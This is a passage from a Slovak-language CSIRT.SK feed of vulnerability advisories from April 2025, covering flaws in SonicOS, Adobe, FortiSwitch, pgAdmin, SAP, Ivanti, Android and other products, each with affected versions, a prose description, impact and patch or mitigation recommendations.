Zariadenia série TZ80 so SonicOS vo verzii firmvéru 8.0.0-8037 a staršej

Pozn.: Zraniteľnosť je možné zneužiť len na zariadeniach, na ktorých je aktivovaná služba SSLVPN.

Opis zraniteľnosti:

CVE-2025-32818 (CVSS 3.1 skóre: 7,5)

Vysoko závažná zraniteľnosť s identifikátorom CVE-2025-32818 sa nachádza v rozhraní SSLVPN Virtual Office systému SonicOS a spočíva v dereferencii nulového ukazovateľa. Vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorených požiadaviek mohol zneužiť na vyvolanie pádu firewallu vedúci k zneprístupneniu služby.

Možné škody:

Zneprístupnenie služby (DoS)

Odporúčania:

Administrátorom odporúčame vykonať aktualizáciu firmvéru zraniteľných zariadení na verzie 7.2.0-7015 (Gen7 Firewalls a Gen7 NSv), 8.0.1-8017 (TZ80) alebo novšie.

V prípade, že aktualizáciu systémov nie je možné vykonať, zraniteľnosť je možné mitigovať aj deaktiváciou služby SSLVPN.

Zdroje:

Active! Mail má kritickú zero-day zraniteľnosť

Marian Danko — Thu, 24 Apr 2025 09:38:58 +0000

Spoločnosť Qualitia opravila kritickú zraniteľnosť v mailovom klientovi Active! Mail, ktorá umožňuje vzdialené vykonávanie kódu. Zraniteľnosť útočníci aktívne zneužívajú.

Zraniteľné systémy:

Active! Mail BuildInfo: 6.60.05008561 a staršie

Opis činnosti:

CVE-2025-42599 (CVSS skóre 9,8)

Vývojári webového mailového klienta Active! Mail opravili kritickú aktívne zneužívanú zraniteľnosť, ktorá umožňuje vzdialené vykonávanie kódu, alebo môže spôsobiť nedostupnosť služby. Chyba spočíva v pretečení medzipamäte zásobníka. Vzdialený neautentifikovaný útočník ju môže zneužiť odoslaním špeciálne vytvorenej požiadavky zraniteľnej inštancii servera Active! Mail. Interakcia používateľa nie je potrebná.

Aplikácia je obľúbená najmä v japonsko-jazyčnom prostredí.

Možné škody:

Vzdialené vykonávanie kódu
Nedostupnosť služby (DoS)

Odporúčania:

Bezodkladná aktualizácia Active! Mail aspoň na verziu BuildInfo: 6.60.06008562.

Odkazy:

Kritické bezpečnostné zraniteľnosti v produktoch Adobe

Marian Danko — Tue, 22 Apr 2025 11:32:04 +0000

Spoločnosť Adobe vydala bezpečnostné aktualizácie na svoje produkty ColdFusion, After Effects, Media Encoder, Bridge, Experience Manager (AEM) Forms on JEE, Premiere Pro, Photoshop, Animate, Experience Manager (AEM) Screens, FrameMaker, XMP-Toolkit-SDK, Commerce, Commerce B2B a Magento Open Source, ktoré opravujú 58 zraniteľností, z čoho 28 je označených ako kritické. Najzávažnejšie kritické zraniteľnosti by vzdialený útočník mohol zneužiť na získanie neoprávneného prístupu k citlivým údajom a vykonanie škodlivého kódu.

Zraniteľné systémy:

Adobe ColdFusion 2025 vo verziách starších ako Update 1
Adobe ColdFusion 2023 vo verziách starších ako Update 13
Adobe ColdFusion 2021 vo verziách starších ako Update 19
Adobe After Effects 24.6.X vo verziách starších ako 24.6.5
Adobe After Effects 25.X vo verziách starších ako 25.2
Adobe Media Encoder 24.6.X vo verziách starších ako 24.6.5
Adobe Media Encoder 25.X vo verziách starších ako 25.2
Adobe Bridge 14.1.X vo verziách starších ako 14.1.6
Adobe Bridge 15.0.X vo verziách starších ako 15.0.3
Adobe Experience Manager (AEM) Forms on JEE vo verziách starších ako 6.5.22.0 (AEMForms-6.5.0-0095)
Adobe Premiere Pro 24.6.X vo verziách starších ako 24.6.5
Adobe Premiere Pro 25.X vo verziách starších ako 25.2
Adobe Photoshop 2025 vo verziách starších ako 26.5
Adobe Photoshop 2024 vo verziách starších ako 25.12.2
Adobe Animate  2023 vo verziách starších ako 23.0.11
Adobe Animate  2024 vo verziách starších ako 24.0.8
Adobe Experience Manager (AEM) Screens vo verziách starších ako AEM 6.5 Screens FP11.4
Adobe FrameMaker 2020 vo verziách starších ako Update 8
Adobe FrameMaker 2022 vo verziách starších ako Update 6
Adobe XMP-Toolkit-SDK vo verziách starších ako 2025.03
Adobe Commerce vo verziách starších ako 2.4.8
Adobe Commerce 2.4.7-XXvo verziách starších ako 2.4.7-p5
Adobe Commerce 2.4.6-XX vo verziách starších ako 2.4.6-p10
Adobe Commerce 2.4.5-XX vo verziách starších ako 2.4.5-p12
Adobe Commerce 2.4.4-XX vo verziách starších ako 2.4.4-p13
Adobe Commerce B2B vo verziách starších ako 1.5.2
Adobe Commerce B2B 1.4.2-XX vo verziách starších ako 1.4.2-p5
Adobe Commerce B2B 1.3.5-XX vo verziách starších ako 1.3.5-p10
Adobe Commerce B2B 1.3.4-XX vo verziách starších ako 1.3.4-p12
Adobe Commerce B2B 1.3.3-XX vo verziách starších ako 1.3.3-p13
Magento Open Source vo verziách starších ako 2.4.8
Magento Open Source 2.4.7-XX vo verziách starších ako 2.4.7-p5
Magento Open Source 2.4.6-XX vo verziách starších ako 2.4.6-p10
Magento Open Source 2.4.5-XX vo verziách starších ako 2.4.5-p12
Magento Open Source 2.4.4-XX vo verziách starších ako 2.4.4-p13

Opis zraniteľnosti:

Adobe ColdFusion:

CVE-2025-24447, CVE-2025-30282 (CVSS skóre 9,1); CVE-2025-30287 (CVSS skóre 8,1); CVE-2025-30284, CVE-2025-30285, CVE-2025-30286 (CVSS skóre 8,0); CVE-2025-30289 (CVSS skóre 7,5)

Kritické zraniteľnosti spočívajú v deserializácii nedôveryhodných dát (CVE-2025-24447, CVE-2025-30284, CVE-2025-30285), nesprávnej autentifikácii (CVE-2025-30282, CVE-2025-30287) a nedostatočnej neutralizácii špeciálnych elementov v rámci príkazov operačného systému (CVE-2025-30286, CVE-2025-30289). Vzdialený útočník by ich mohol zneužiť na vykonanie škodlivého kódu.

CVE-2025-24446, CVE-2025-30281 (CVSS skóre 9,1)

Kritické zraniteľnosti v produkte Adobe Coldfusion spočívajú v nedostatočnom overovaní používateľských vstupov (CVE-2025-24446) a nesprávnom riadení prístupu (CVE-2025-30281). Vzdialený autentifikovaný používateľ by ich mohol zneužiť na čítanie obsahu ľubovoľných súborov na súborovom systéme a získanie neoprávneného prístupu k citlivým údajom.

CVE-2025-30290 (CVSS skóre 7,8), CVE-2025-30288 (CVSS skóre 7,8)

Zraniteľnosti spočívajúce v nesprávnom riadení prístupu (CVE-2025-30288) a nesprávnom limitovaní prístupov k priečinkom s obmedzeným prístupom (eng. Restricted Directories) (CVE-2025-30290) by útočník mohol zneužiť na obídenie bezpečnostných prvkov a narušenie dôvernosti, integrity a dostupnosti systému.

Adobe After Effects:

CVE-2025-27182, CVE-2025-27183 (CVSS skóre 7,8)

Zraniteľnosti spočívajúce v použití v zápise mimo povolených hodnôt pamäte umožňujú vykonanie škodlivého kódu.

Adobe Media Encoder:

CVE-2025-27194, CVE-2025-27195 (CVSS skóre 7,8)

CVE-2025-27194 spočíva v zápise mimo povolených hodnôt v pamäti a CVE-2025-27195 v pretečením medzipamäte haldy. Obe zraniteľnosti by vzdialený neautentifikovaný útočník podvrhnutím špeciálne vytvorených súborov mohol zneužiť na vzdialené vykonanie kódu.

Adobe Bridge:

CVE-2025-27193 (CVSS skóre 7,8)

Pretečenie medzipamäte haldy v produkte Adobe Bridge možno zneužiť na vykonanie škodlivého kódu.

Adobe Experience Manager Forms:

CVE-2024-38819, CVE-2024-38820 (CVSS skóre 7,5)

Zraniteľnosti v externom frameworku Spring možno zneužiť na získanie neoprávneného prístupu k citlivým údajom.

Adobe Premiere Pro:

CVE-2025-27196 (CVSS skóre 7,8)

Zraniteľnosť s identifikátorom CVE-2025-27196 spočíva v pretečení medzipamäte haldy a vzdialený neautentifikovaný útočník by ju mohol zneužiť na vzdialené vykonanie kódu. Zneužitie zraniteľnosti vyžaduje interakciu zo strany používateľa, ktorý musí otvoriť špeciálne vytvorený súbor.

Adobe Animate:

CVE-2025-27199, CVE-2025-27200 (CVSS skóre 7,8)

Pretečenie medzipamäte haldy (CVE-2025-27199) a použitie odalokovaného miesta v pamäti (CVE-2025-27200) možno zneužiť na vzdialené vykonanie kódu.

Adobe Photoshop:

CVE-2025-27198 (CVSS skóre 7,8)

Kritická zraniteľnosť s identifikátorom CVE-2025-27198 spočíva v pretečení medzipamäte haldy a možno ju zneužiť na vykonanie kódu.

Adobe FrameMaker:

CVE-2025-30304, CVE-2025-30295, CVE-2025-30296, CVE-2025-30297, CVE-2025-30298, CVE-2025-30299 (CVSS skóre 7,8)

Kritické zraniteľnosti v Adobe FrameMaker možno zneužiť na vzdialené vykonanie kódu. Predmetné zraniteľnosti spočívajú v zápise mimo povolených hodnôt (CVE-2025-30304, CVE-2025-30297), pretečení medzipamäte haldy (CVE-2025-30295, CVE-2025-30299), podtečení celočíselnej premennej (CVE-2025-30296) a pretečení vyrovnávacej pamäte zásobníka (CVE-2025-30298).

Možné škody:

Vykonanie škodlivého kódu
Neoprávnený prístup k citlivým údajom
Obídenie bezpečnostného prvku
Zneprístupnenie služby
Eskalácia privilégií

Odporúčania:

Zdroje:

Kritická zraniteľnosť v zariadeniach Fortinet FortiSwitch

Marian Danko — Tue, 22 Apr 2025 11:30:43 +0000

Spoločnosť Fortinet vydala bezpečnostné aktualizácie, ktoré opravujú kritickú zraniteľnosť v zariadeniach FortiSwitch. Zraniteľnosť možno zneužiť na neoprávnenú zmenu prihlasovacích údajov administrátorských účtov a následné získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

Fortinet FortiSwitch 7.6.0
Fortinet FortiSwitch 7.4.0 až 7.4.4
Fortinet FortiSwitch 7.2.0 až 7.2.8
Fortinet FortiSwitch 7.0.0 až 7.0.10
Fortinet FortiSwitch 6.4.0 až 6.4.14

Opis zraniteľnosti:

CVE-2024-48887 (CVSS 3.1 skóre: 9,8)

Zraniteľnosť s identifikátorom CVE-2024-48887 sa nachádza v GUI rozhraní a spočíva v nedostatočnom overovaní požiadaviek pre zmenu hesiel. Vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorených HTTP požiadaviek cez rozhranie set_password mohol zneužiť na zmenu prihlasovacích údajov administrátorských účtov. Tieto kontá by následne mohol zneužiť na neoprávnený prístup do systému a získanie úplnej kontroly nad systémom.

Možné škody:

Neoprávnená zmena v systéme
Získanie neoprávneného prístupu do systému
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom odporúčame bezodkladnú aktualizáciu FortiSwitch na verzie 7.6.1, 7.4.5, 7.2.9, 7.0.11 a 6.4.15 alebo novšie.

V prípade, že aktualizáciu nie je možné vykonať, zraniteľnosť je možné mitigovať limitovaním prístupu k zariadeniam alebo úplným vypnutím HTTP/HTTPS prístupu z administratívnych rozhraní. Detailný návod môžete nájsť v odporúčaní od výrobcu v časti Workaround.

Taktiež odporúčame vykonať kontrolu logov zariadenia na prítomnosť pokusov o zneužitie tejto zraniteľnosti. Pri preverovaní sa zamerajte na nezvyčajné HTTP požiadavky smerujúce na FortiSwitch a podozrivé aktivity súvisiace s GUI a zmenou hesiel.

Zdroje:

Zraniteľnosť v OpenVPN možno zneužiť na zneprístupnenie služby

Marian Danko — Tue, 22 Apr 2025 11:27:29 +0000

Vývojári OpenVPN vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú vysoko závažnú zraniteľnosť. Zraniteľnosť s identifikátorom CVE-2025-2704 možno zneužiť na zneprístupnenie služby.

Zraniteľné systémy:

OpenVPN vo verziách 2.6.1 až 2.6.13

Pozn.: Zraniteľnosť je možné zneužiť len na inštanciách OpenVPN prevádzkovaných v režime servera, ktoré využívajú funkcionalitu TLS-crypt-v2.

Opis zraniteľnosti:

CVE-2025-2704 (CVSS 3.1 skóre: 7,5)

Zraniteľnosť spočíva v nedostatočnom overovaní hraničných a chybových stavov a vzdialený neautentifikovaný útočník by ju vo fáze počiatočného handshaku mohol zneužiť na zneprístupnenie služby. Zraniteľnosť možno zneužiť opakovaným zasielaním špeciálne vytvorených paketov.

Možné škody:

Zneprístupnenie služby

Odporúčania:

Administrátorom a používateľom odporúčame bezodkladnú aktualizáciu OpenVPN na verziu 2.6.14 alebo novšiu.

Zraniteľnosť možno mitigovať deaktiváciou mechanizmu tls-crypt-v2 v konfiguračnom súbore OpenVPN.

Zdroje:

Kritické zraniteľnosti v nástroji pgAdmin 4

Marian Danko — Tue, 22 Apr 2025 11:25:26 +0000

Vývojári nástroja na administráciu databáz PostgreSQL pgAdmin 4 vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú 2 kritické zraniteľnosti. CVE-2025-2946 možno zneužiť na realizáciu XSS útokov a CVE-2025-2945 na vzdialené vykonanie kódu.

Zraniteľné systémy:

pgAdmin 4 vo verziách starších ako 9.2

Opis zraniteľnosti:

CVE-2025-2945 (CVSS 3.1 skóre: 9,9)

Zraniteľnosť spočíva v nedostatočnom overovaní používateľských vstupov v rámci komponentov Query Tool a Cloud Deployment. Hodnoty parametrov query_commited a high_availability, zadávané používateľmi cez požiadavky POST, sú použité ako vstup pre funkciu eval() programovacieho jazyka Python bez ich predošlej sanitizácie. Vzdialený autentifikovaný útočník by ich zaslaním špeciálne vytvorených požiadaviek mohol zneužiť na vzdialené vykonanie kódu a úplné narušenie dôvernosti, integrity a dostupnosti systému.

CVE-2025-2946 (CVSS 3.1 skóre: 9,1)

CVE-2025-2946 spočíva v nedostatočnom ošetrovaní návratových hodnôt databázových dopytov v rámci komponentov Query Tool a View/Edit Data a možno ich zneužiť na realizáciu XSS (cross-site scripting) útokov vedúcich k vykonaniu HTML/JavaScript kódu vo webovom prehliadači obete.

Pozn.: Pre uvedené zraniteľnosti je voľne dostupný proof-of-concept kód demonštrujúci ich zneužitie.

Možné škody:

Vzdialené vykonanie kódu
Úplné narušenie dôvernosti, integrity a dostupnosti systému

Odporúčania:

Administrátorom a používateľom odporúčame vykonať bezodkladnú aktualizáciu pgAdmin 4 na verziu 9.2 alebo novšiu.

Zdroje:

Kritické zraniteľnosti v produktoch SAP

Marian Danko — Tue, 22 Apr 2025 11:22:51 +0000

Spoločnosť SAP vydala bezpečnostné aktualizácie na svoje portfólio produktov, ktoré opravujú 20 zraniteľností, z ktorých 3 sú označené ako kritické. CVE-2025-27429 a CVE-2025-31330 v produktoch SAP S/4HANA a SAP Landscape Transformation možno zneužiť na vzdialené vykonanie kódu. CVE-2025-30016 v produkte SAP Financial Consolidation možno zneužiť na obídenie mechanizmov autentifikácie.

Zraniteľné systémy:

SAP S/4HANA (Private Cloud) vo verziách S4CORE 102, 103, 104, 105, 106, 107, 108
SAP Landscape Transformation (Analysis Platform) vo verziách DMIS 2011_1_700, 2011_1_710, 2011_1_730, 2011_1_731
SAP Financial Consolidation vo verzii FINANCE 1010

Opis zraniteľnosti:

CVE-2025-27429, CVE-2025-31330 (CVSS 3.1 skóre: 9,9)

Zraniteľnosti v produktoch SAP S/4HANA a SAP Landscape Transformation (SLT) sa nachádzajú v bližšie nešpecifikovaných funkciách prístupných prostredníctvom volaní RFC (Remote Function Call). Vzdialený autentifikovaný útočník by ich mohol zneužiť na podvrhnutie špeciálne vytvoreného kódu ABAP (Advanced Business Application Programming), čo by mu umožnilo obídenie kontrol autorizácie a získanie úplnej kontroly nad systémom.

CVE-2025-30016 (CVSS 3.1 skóre: 9,8)

SAP Financial Consolidation obsahuje zraniteľnosť s identifikátorom CVE-2025-30016, ktorá spočíva v nedostatočnej implementácii mechanizmov autentifikácie. Zraniteľnosť by vzdialený neautentifikovaný útočník mohol zneužiť na obídenie mechanizmov autentifikácie a získanie administrátorského prístupu do systému.

Možné škody:

Vzdialené vykonanie kódu
Obídenie mechanizmov autentifikácie
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom a používateľom odporúčame vykonať bezodkladnú aktualizáciu zraniteľných systémov na verzie špecifikované na stránke výrobcu.

Zdroje:

Zraniteľnosti v databázovom systéme SQLite

Marian Danko — Tue, 22 Apr 2025 11:21:52 +0000

Vývojári databázového systému SQLite vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú dve zraniteľnosti. Ich zneužitím možno vyvolať poškodenie pamäte a zneprístupnenie služby kvôli pádu aplikácie.

Zraniteľné systémy:

SQLite 3.44.0 až 3.49.0

Opis zraniteľnosti:

CVE-2025-29087 (CVSS 3.1 skóre: 9,8 / 3,2)

Zraniteľnosť sa nachádza v SQL funkcii concat_ws() a vzdialený neautentifikovaný útočník by ju zaslaním veľkých reťazcov (2MB alebo väčšie) mohol zneužiť na pretečenie celočíselnej premennej a následné vyvolanie poškodenia pamäte.

CVE-2025-29088 (CVSS 3.1 skóre: 7,5 / 5,6)

Zraniteľnosť spočíva v nesprávnej implementácii operácie násobenia sz*nBig. Zaslaním špeciálne vytvorených argumentov do sqlite3_db_config používaného v rámci API rozhrania programovacieho jazyka C možno spôsobiť nesprávnu alokáciu pamäte, čo môže viesť ku pádu aplikácie, resp. zneprístupneniu služby.

Možné škody:

Poškodenie pamäte
Zneprístupnenie služby

Odporúčania:

Odporúčame vykonať bezodkladnú aktualizáciu SQLite na verziu 3.49.1.

Zdroje:

Zraniteľnosť aplikácie WhatsApp for Windows umožňovala vzdialené vykonanie kódu

Marian Danko — Tue, 22 Apr 2025 11:20:23 +0000

Spoločnosť Meta vydala bezpečnostné aktualizácie pre aplikáciu WhatsApp for Windows, ktoré opravujú bezpečnostnú zraniteľnosť CVE-2025-30401. Napriek tomu, že sa jedná o zraniteľnosť strednej závažnosti, možno ju zneužiť na vzdialené vykonanie škodlivého kódu.

Zraniteľné systémy:

WhatsApp for Windows vo verziách starších ako 2.2450.6

Opis zraniteľnosti:

CVE-2025-30401 (CVSS 3.1 skóre: 6,7)

Zraniteľnosť spočíva v nekonzistencii vyhodnocovania typu súborov, ktoré aplikácia WhatsApp zobrazuje na základe MIME typu, ale po kliknutí sú otvárané asociovaným programom na základe ich prípony. Tento nesúlad je možné podvrhnutím špeciálne vytvorených súborov zneužiť na realizáciu tzv. spoofing útokov vedúcich k vzdialenému vykonaniu kódu.

Zneužitie zraniteľnosti vyžaduje interakciu zo strany používateľa, ktorý musí predmetný súbor otvoriť na svojom zariadení.

Možné škody:

Vzdialené vykonanie kódu

Odporúčania:

Používateľom aplikácie WhatsApp for Windows odporúčame vykonať bezodkladnú aktualizáciu na verziu 2.2450.6 alebo novšiu.

Používateľom odporúčame neinteragovať so správami a prílohami prijatými z neznámych a nedôveryhodných zdrojov.

Vzhľadom na aktuálne prebiehajúcu phishingovú kampaň zameranú na používateľov WhatsApp odporúčame venovať zvýšenú pozornosť aj podozrivým správam prijatým od známych. Útočníci cez platfomu WhatsApp rozposielajú žiadosti o hlasovanie v tanečnej súťaži, ktoré obsahujú URL odkazy vedúce na stránky s phishingovým obsahom. Sofistikovaný phishing sa snaží presvedčiť používateľa na pridanie zariadenia útočníka do zoznamu prepojených zariadení (eng. Linked Devices), čo im umožňuje úplný prístup ku kontaktom, správam a taktiež rozposielanie správ. V súvislosti s touto kampaňou Národné centrum kybernetickej bezpečnosti vydalo na svojej stránke varovanie.

Zdroje:

Google opravil 2 aktívne zneužívané zero-day zraniteľnosti operačného systému Android

Marian Danko — Thu, 10 Apr 2025 11:36:13 +0000

Spoločnosť Google vydala bezpečnostné aktualizácie pre svoj operačný systém Android, ktoré opravujú 62 zraniteľností, z čoho 4 je označených ako kritické a 2 ako aktívne zneužívané. CVE-2024-53150 a CVE-2024-53197 v kerneli možno zneužiť na eskaláciu privilégií a získanie neoprávneného prístupu k citlivým údajom.

Zraniteľné systémy:

Zariadenia s operačným systémom Android bez aktualizácie z 05.04.2025

Opis zraniteľnosti:

Kritické zraniteľnosti:

Najzávažnejšie zraniteľnosti možno zneužiť na získanie neoprávneného prístupu k citlivým údajom (CVE-2025-22429, CVE-2024-45551), eskaláciu privilégií (CVE-2025-26416) a zneprístupnenie služby (CVE-2025-22423).

Aktívne zneužívané zraniteľnosti:

CVE-2024-53150 (CVSS 3.1 skóre: 7,8)

Zraniteľnosť v kerneli Androidu sa nachádza v ovládači USB-audio pre ALSA. Spočíva v absencii kontroly parametra deskriptorov bLength. Možno ju zneužiť na čítanie mimo povolených hodnôt pamäte a získanie neoprávneného prístupu k citlivým údajom.

CVE-2024-53197 (CVSS 3.1 skóre: 7,8)

Zraniteľnosť v kerneli Androidu sa nachádza v ovládači USB-audio pre zariadenia ALSA a spočíva v možnosti čítania pamäte mimo povolené hodnoty. Zraniteľnosť možno zneužiť na eskaláciu privilégií.

Pozn.: Zraniteľnosti s označením CVE-2024-53150 a CVE-2024-53197 sú v súčasnosti aktívne zneužívané.

Na základe analýzy Amnesty International (ďalej len AI) bola zraniteľnosť CVE-2024-53197 využívaná v rámci forenzných nástrojov Cellebrite, ktoré boli údajne v roku 2024 zneužité srbskou vládou na odomknutie Android zariadenia aktivistu a pokuse o inštaláciu spyvéru. Spoločnosť Cellebrite sa špecializuje na vývoj špecializovaných produktov určených pre orgány činné v trestnom konaní, spravodajské služby a forenzných špecialistov. V nadväznosti na uvedené analýzy Cellebrite ukončila poskytovanie svojich služieb a produktov pre bližšie nešpecifikovaných zákazníkov v Srbsku.

Možné škody:

Eskalácia privilégií
Neoprávnený prístup k citlivým údajom
Zneprístupnenie služby (DoS)

Odporúčania:

Administrátorom a používateľom odporúčame vykonať bezodkladnú inštaláciu aktualizácií operačného systému Android z 5. apríla 2025.

Zdroje:

Aktívne zneužívaná zraniteľnosť v produktoch Ivanti ICS, IPS a ZTA Gateway

Marian Danko — Thu, 10 Apr 2025 11:34:54 +0000

Spoločnosť Ivanti vydala bezpečnostné aktualizácie pre svoje produkty Ivanti Connect Secure (ICS), Ivanti Policy Secure (IPS) a ZTA Gateways, ktoré opravujú aktívne zneužívanú kritickú zraniteľnosť. CVE-2025-22457 možno zneužiť na vzdialené vykonanie kódu a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

Pulse Connect Secure vo verziách starších ako 9.1R18.9 (vrátane, produkt s ukončenou podporou)
Ivanti Connect Secure vo verziách starších ako 22.7R2.6
Ivanti Policy Secure vo verziách starších ako 22.7R1.3 (vrátane)
ZTA Gateways vo verziách starších ako 22.8R2 (vrátane)

Opis zraniteľnosti:

CVE-2025-22457 (CVSS skóre 9,0)

Kritická zraniteľnosť spočíva v pretečení vyrovnávacej pamäte zásobníka a vzdialený neautentifikovaný útočník by ju mohol zneužiť na vzdialené vykonanie kódu a získanie úplnej kontroly nad systémom.

Podľa výrobcu a spoločnosti Mandiant je zraniteľnosť aktívne zneužívaná v rámci útokov na Ivanti Connect Secure a Pulse Connect Secure.

Pozn.: Zraniteľnosť bola v produkte Ivanti Connect Secure odstránená už v aktualizáciách z februára 2025.

Možné škody:

Vzdialené vykonanie kódu
Získanie úplnej kontroly nad systémom

Odporúčania:

Spoločnosť Ivanti odporúča používať produkty s platnou podporou. Výrobca odporúča bezodkladnú aktualizáciu Ivanti Connect Secure na verziu 22.7R2.6 alebo novšiu, Ivanti Policy Secure na verziu 22.7R1.4 (vydanie aktualizácie naplánované na 21. apríla 2025) a ZTA Gateways na verziu 22.8R2.2 (vydanie aktualizácie naplánované na 19. apríla 2025). V prípade produktu Pulse Connect Secure odporúča migráciu na produkt Ivanti Connect Secure s platnou podporou.

Zdroje:

Kritická zraniteľnosť v Apache Parquet

Marian Danko — Thu, 10 Apr 2025 11:33:47 +0000

Vývojári stĺpcovo orientovaného formátu súborov Apache Parquet vydali bezpečnostné aktualizácie pre svoju knižnicu pre Java, ktoré opravujú kritickú zraniteľnosť. CVE-2025-30065 by vzdialený neautentifikovaný útočník mohol zneužiť na vzdialené vykonanie kódu a získanie úplnej kontroly nad systémami využívajúcimi predmetnú knižnicu.

Zraniteľné systémy:

knižnica Java Apache Parquet vo verziách 1.15.0 a starších

Opis činnosti:

CVE-2025-30065 (CVSS skóre 10,0)

Zraniteľnosť v komponente parquet-avro spočíva v nesprávnom parsovaní schém umožňujúcom deserializáciu nedôveryhodných dát. Vzdialený neautentifikovaný útočník by ju podvrhnutím špeciálne vytvorených súborov Parquet mohol zneužiť na vzdialené vykonanie kódu a získanie úplnej kontroly nad systémom.

Pozn.: Zraniteľnosť je možné zneužiť vo všetkých analytických systémoch, ktoré importujú súbory Parquet z externých zdrojov – t.j. veľké big-data frameworky ako napr. Hadoop, Spark alebo Flink, ale aj vlastné aplikácie využívajúce knižnicu Java Parquet.

Možné škody:

Vzdialené vykonanie príkazov
Získanie úplnej kontroly nad systémom

Odporúčania:

Odporúčame uistiť sa, či Vaše produkty a služby nevyužívajú zraniteľné verzie knižnice Java Apache Parquet. Ak áno, odporúčame bezodkladnú aktualizáciu knižnice na verziu 1.15.1 alebo novšiu.

Mitigovať zraniteľnosť môžete dôkladnou validáciou súborov Parquet, pred ich importovaním a spracovaním.

Zdroje:

Mesačná správa CSIRT.SK – marec 2025

Marian Danko — Wed, 09 Apr 2025 09:21:00 +0000

V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci marec 2025. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.

Mesačná správa – 03/2025 PDF (1 492 KB)

Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás.

Kritické zraniteľnosti v úložiskách Dell Unity, Dell UnityVSA a Dell Unity XT

Marian Danko — Mon, 07 Apr 2025 13:24:57 +0000

Spoločnosť Dell vydala bezpečnostné aktualizácie na svoje úložiská Dell Unity, Dell UnityVSA a Dell Unity XT, ktoré opravujú 15 zraniteľností, z čoho 2 sú označené ako kritické. Kritickú zraniteľnosť s označením CVE-2025-22398 možno zneužiť na vzdialené vykonanie kódu a zraniteľnosť CVE-2025-24383 na vykonanie neoprávnených zmien v systéme, ktoré môžu spôsobiť úplnú nedostupnosť služieb.

Zraniteľné systémy:

Dell Unity s Dell Unity Operating Environment (OE) vo verziách starších ako 5.5.0.0.5.259
Dell UnityVSA s Dell Unity Operating Environment (OE) vo verziách starších ako 5.5.0.0.5.259
Dell Unity XT s Dell Unity Operating Environment (OE) vo verziách starších ako 5.5.0.0.5.259

Opis činnosti:

Kritické zraniteľnosti

CVE-2025-22398 (CVSS skóre 9,8)

Zraniteľnosť spočíva v nesprávnej neutralizácii špeciálnych elementov používaných v príkazoch operačného systému. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na vzdialené vykonanie systémových príkazov s oprávneniami používateľa root a následné získanie úplnej kontroly nad systémom.

CVE-2025-24383 (CVSS skóre 9,1)

Zraniteľnosť spočíva v nesprávnej neutralizácii špeciálnych elementov používaných v príkazoch operačného systému. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na zmazanie ľubovoľných súborov na súborovom systéme zariadenia. Zmazanie súboru môže v závislosti od jeho využitia v systéme viesť k zmene konfigurácie alebo úplnej nedostupnosti systému.

Vysoko závažné zraniteľnosti

Identifikátor CVE-2025-24381 (CVSS skóre 8,8) je pridelený tzv. open redirect zraniteľnosti, ktorú by vzdialený neautentifikovaný útočník mohol zneužiť na presmerovanie používateľov na ľubovoľný URL odkaz. Zneužitie zraniteľnosti vyžaduje interakciu zo strany používateľa, ktorý musí navštíviť špeciálne vytvorený URL odkaz.

Ostatné zraniteľnosti vysokej závažnosti (CVE-2024-49563, CVE-2024-49564, CVE-2024-49565, CVE-2024-49566, CVE-2025-23383, CVE-2025-24377, CVE-2025-24378, CVE-2025-24379, CVE-2025-24380, CVE-2025-24385, CVE-2025-24386, CVE-2024-49601, CVE-2025-24382) spočívajú v nesprávnej neutralizácii špeciálnych elementov používaných v príkazoch operačného systému a lokálny útočník by ich mohol zneužiť na eskaláciu privilégií a vzdialené vykonanie príkazov a kódu.

Možné škody:

Vzdialené vykonanie príkazov
Neoprávnená zmena v systéme
Zneprístupnenie služby (DoS)
Presmerovanie používateľov na škodlivé URL

Odporúčania:

Bezodkladná aktualizácia Dell Unity Operating Environment (OE) na Dell Unity, Dell UnityVSA a Dell Unity XT na verziu 5.5.0.0.5.259 alebo novšiu.

Zdroje:

Návod pre overenie úniku prihlasovacích údajov z Vašej domény

Marian Danko — Mon, 07 Apr 2025 12:32:18 +0000

Zažili ste vo Vašej organizácii únik prihlasovacích údajov do e-mailového alebo iného konta Vášho zamestnanca? Bohužiaľ čo sa týka podobných incidentov, otázka z praxe neznie “či”, ale “kedy”. Ako môžete zabrániť kompromitácii Vašej infraštruktúry, keď už má útočník valídne prihlasovacie údaje? Ak máte potrebnú vedomosť, môžete konať skôr, ako on.

V rámci proaktívnych činností VJ CSIRT sme vydali pre Vás stručný návod “Overenie úniku prihlasovacích údajov pre konkrétnu doménu (v rámci známych databáz únikov v službe HaveIBeenPwned)“.

Vysoko závažné zraniteľnosti v produktoch Splunk

Marian Danko — Mon, 07 Apr 2025 12:07:14 +0000

Spoločnosť Splunk vydala bezpečnostné aktualizácie na svoje produkty Splunk Enterprise, Splunk Cloud Platform a Splunk Secure Gateway, ktoré opravujú 8 bezpečnostných zraniteľností, z čoho 2 sú označené ako vysoko závažné. CVE-2025-20229 možno zneužiť na vzdialené vykonanie kódu a CVE-2025-20231 na získanie neoprávneného prístupu k citlivým údajom. Aktualizácie taktiež opravujú viacero zraniteľností v komponentoch tretích strán, ktoré sú v rámci produktov využívané.

Zraniteľné systémy:

Splunk Enterprise 9.4.X vo verziách starších ako 9.4.1
Splunk Enterprise 9.3.X vo verziách starších ako 9.3.3
Splunk Enterprise 9.2.X vo verziách starších ako 9.2.5
Splunk Enterprise 9.1.X vo verziách starších ako 9.1.8
Splunk Cloud Platform 9.3.2408.X vo verziách starších ako 9.3.2408.104
Splunk Cloud Platform 9.2.2406.X vo verziách starších ako 9.2.2406.108
Splunk Cloud Platform 9.2.2403.X vo verziách starších ako 9.2.2403.114
Splunk Cloud Platform 9.1.2312.X vo verziách starších ako 9.1.2312.208
Splunk Cloud Platform 9.1.2308.X vo verziách starších ako 9.1.2308.214
